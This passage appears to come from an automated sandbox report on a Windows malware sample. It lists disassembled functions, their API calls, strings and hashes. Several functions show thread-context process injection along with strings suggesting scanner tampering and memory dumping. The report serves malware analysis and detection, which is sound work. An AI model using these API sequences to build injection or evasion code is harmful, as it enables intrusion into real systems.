                                                              • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B9A9D0
                                                              • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B9A9E2
                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B9A9F4
                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B9AA06
                                                              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B9AA18
                                                              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B9AA2A
                                                              • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B9AA3C
                                                              • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B9AA4E
                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B9AA60
                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B9AA72
                                                              • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B9AA84
                                                              • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B9AA96
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                              • API String ID: 667068680-597814768
                                                              • Opcode ID: de2aba2e45c38df419d8a24648db3b871e21f8a7cb4126cbddd14bc8901dfca5
                                                              • Instruction ID: fa2d7c08963535ea822810031a1ae9833ec43e1218a9759bc82fe18609e8881a
                                                              • Opcode Fuzzy Hash: de2aba2e45c38df419d8a24648db3b871e21f8a7cb4126cbddd14bc8901dfca5
                                                              • Instruction Fuzzy Hash: 69318FB0A90760EFEF10AFB8D885A6A37EAEB06740B5009F5F40ADF215D7749850CF51
                                                              Function 02B98BB0 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02B98824: LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
                                                                • Part of subcall function 02B98824: FreeLibrary.KERNEL32(74FC0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74FC0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB
                                                              • GetThreadContext.KERNEL32(00000000,02BE1420,ScanString,02BE13A4,02B9A77C,UacInitialize,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,UacInitialize,02BE13A4), ref: 02B99442
                                                                • Part of subcall function 02B979B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B97A27
                                                                • Part of subcall function 02B97D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74
                                                              • SetThreadContext.KERNEL32(00000000,02BE1420,ScanBuffer,02BE13A4,02B9A77C,ScanString,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,00000000,-00000008,02BE14F8,00000004,02BE14FC), ref: 02B9A157
                                                              • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02BE1420,ScanBuffer,02BE13A4,02B9A77C,ScanString,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,00000000,-00000008,02BE14F8), ref: 02B9A164
                                                                • Part of subcall function 02B987A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,UacScan), ref: 02B987B4
                                                                • Part of subcall function 02B987A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B987CE
                                                                • Part of subcall function 02B987A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize), ref: 02B9880A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$Thread$ContextFreeLoadMemoryVirtual$AddressAllocateProcResumeWrite
                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                              • API String ID: 4180202596-51457883
                                                              • Opcode ID: 3bc68f6e76866b446f4c02e97da6e817cf4926bdf85da57035bc258e7a0cabbc
                                                              • Instruction ID: e56dc092587a7425e98617c74bdd4ca2b52ea06b1914e488ed30daccc74e0ae1
                                                              • Opcode Fuzzy Hash: 3bc68f6e76866b446f4c02e97da6e817cf4926bdf85da57035bc258e7a0cabbc
                                                              • Instruction Fuzzy Hash: 7AE2E635A5011A9FDF11FBA4DC91ADE73BAAF89310F1084F1E109AB224DE35AE46CF51
                                                              Function 02B98BAE Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02B98824: LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
                                                                • Part of subcall function 02B98824: FreeLibrary.KERNEL32(74FC0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74FC0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB
                                                              • GetThreadContext.KERNEL32(00000000,02BE1420,ScanString,02BE13A4,02B9A77C,UacInitialize,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,UacInitialize,02BE13A4), ref: 02B99442
                                                                • Part of subcall function 02B979B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B97A27
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AllocateContextFreeLoadMemoryThreadVirtual
                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                              • API String ID: 4236972194-51457883
                                                              • Opcode ID: b0a8ff2def0f5cd7491d10d4cf3180583b3961197b79c58d1cb7e747443585bb
                                                              • Instruction ID: a0c72d54ce5fbdb53d6ce4596711ce11cad0a18ee8b1695d1722386a183ce621
                                                              • Opcode Fuzzy Hash: b0a8ff2def0f5cd7491d10d4cf3180583b3961197b79c58d1cb7e747443585bb
                                                              • Instruction Fuzzy Hash: 22E2D635A5011A9FDF11FBA4DC91ADE73BAAF89310F1084F1E109AB224DE35AE46CF51
                                                              Function 02B858B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B858D1
                                                              • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B858E8
                                                              • lstrcpynA.KERNEL32(?,?,?), ref: 02B85918
                                                              • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B8597C
                                                              • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859B2
                                                              • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859C5
                                                              • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859D7
                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000,02BAD790), ref: 02B859E3
                                                              • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338,02B80000), ref: 02B85A17
                                                              • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B87338), ref: 02B85A23
                                                              • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B85A45
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                              • String ID: GetLongPathNameA$\$kernel32.dll
                                                              • API String ID: 3245196872-1565342463
                                                              • Opcode ID: 4573de47a3e10493b49ca72d7b493c51fd3a6bb6065726c6ffed4226b08a52d5
                                                              • Instruction ID: 78037737497b0d3f00325eaeac12c48656ba8a9215c633ecf892bccdd2660811
                                                              • Opcode Fuzzy Hash: 4573de47a3e10493b49ca72d7b493c51fd3a6bb6065726c6ffed4226b08a52d5
                                                              • Instruction Fuzzy Hash: FA415C71D00259AFDB20EAE8CCC8AEEB3ADEB08310F4545E5A15CE7241E770AA45CF54
                                                              Function 02B85B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B85B94
                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B85BA1
                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B85BA7
                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B85BD2
                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C19
                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C29
                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C51
                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C61
                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B85C87
                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B85C97
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                              • API String ID: 1599918012-2375825460
                                                              • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                              • Instruction ID: 2cdaac62cca5567b1c7c5ac2aff5a96723207d703ffdc93bfd39531b8683dc98
                                                              • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                              • Instruction Fuzzy Hash: 21318471E4021C2AEB35EEB89C85FEF77AD9B04380F4501E1964CE6181DB749E84CF91
                                                              Function 02C24C8C Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ee65118e21ad850d673eeb422f47b08f07919d3d7449f3c795c8270207e56b85
                                                              • Instruction ID: b8b9acfb9abd3026bcd2ad8cb497bd4f13285487a1d6fb774b9ce099c53aa44c
                                                              • Opcode Fuzzy Hash: ee65118e21ad850d673eeb422f47b08f07919d3d7449f3c795c8270207e56b85
                                                              • Instruction Fuzzy Hash: 41020D71E001299BDF28CFA9C8807AEF7F1EF88314F154169D915E7384DB31AA45CB90
                                                              Function 02C32960 Relevance: 2.9, APIs: 1, Instructions: 1381COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID:
                                                              • API String ID: 4168288129-0
                                                              • Opcode ID: 574624ca80bd3090ad8ffd14a1ba33031806d4e91f5e8e29c299907347f52519
                                                              • Instruction ID: 5ba39a8ab09f7e4757c38f118a450af8577e12450aa4c23a2f397335d30ad914
                                                              • Opcode Fuzzy Hash: 574624ca80bd3090ad8ffd14a1ba33031806d4e91f5e8e29c299907347f52519
                                                              • Instruction Fuzzy Hash: 4FC24B71E086688FDB26CE28DD407E9B7B5EB84305F1449EAD84DE7240E775AE818F81
                                                              Function 02C12C87 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: a0300bf0e74490e07b48137b646e8018063fd0ad9baab8b1153cdb7e3f9059d1
                                                              • Instruction ID: fa8f0d6572c74e849a51fc25bbaae835b8a18a7ae9050600e2e2dd25ec7b5bf9
                                                              • Opcode Fuzzy Hash: a0300bf0e74490e07b48137b646e8018063fd0ad9baab8b1153cdb7e3f9059d1
                                                              • Instruction Fuzzy Hash: 04126D366083158BD704DF75C892A1EB3E2BFC8714F15896DE899AB380DB74E8059F83
                                                              Function 02C066DE Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xC
                                                              • API String ID: 0-2612284313
                                                              • Opcode ID: d458ade9fa3e430e56a490dc559ca3233c0ac936792f1b09f2272965098b9e79
                                                              • Instruction ID: d520aae8929b2d216974b20dfe282f8a3cb0a740583ea25d029f5fab448067fb
                                                              • Opcode Fuzzy Hash: d458ade9fa3e430e56a490dc559ca3233c0ac936792f1b09f2272965098b9e79
                                                              • Instruction Fuzzy Hash: ED0292716146528FC758CF2EE88063AB7E1EB8E306B45853EE495C7781EB34E931CB94
                                                              Function 02B87F5A Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B87F7D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1705453755-0
                                                              • Opcode ID: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                                                              • Instruction ID: b1f63745ac3f3c722d64e7c101b13e3215ace84cf0114bf9c2738571bfccfa55
                                                              • Opcode Fuzzy Hash: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                                                              • Instruction Fuzzy Hash: 7C11C0B5A00209AFDB04DF99CD819EFF7F9EFC8704B14C569A509EB254E6719A01CB90
                                                              Function 02B8A74C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                              • Instruction ID: 0d2da3e715386df9dc3f847760234b00ef292f80ff2195287f8744c0f78bb985
                                                              • Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                                              • Instruction Fuzzy Hash: B2E0923570021417D311B5585C80AEAB3AD9758310F0041AAA90CC7341FEA09D408AE8
                                                              Function 02B8B714 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetVersionExA.KERNEL32(?,02BAC106,00000000,02BAC11E), ref: 02B8B722
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
